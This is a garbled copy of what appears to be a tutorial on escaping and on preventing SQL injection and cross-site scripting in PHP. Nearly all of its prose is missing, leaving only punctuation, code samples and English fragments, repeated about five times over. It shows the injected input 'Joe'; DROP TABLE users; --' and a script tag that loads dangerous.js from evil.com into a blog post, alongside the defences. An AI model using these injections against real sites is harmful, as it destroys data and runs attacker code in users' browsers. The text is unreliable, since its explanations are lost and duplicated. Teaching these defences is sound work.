SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

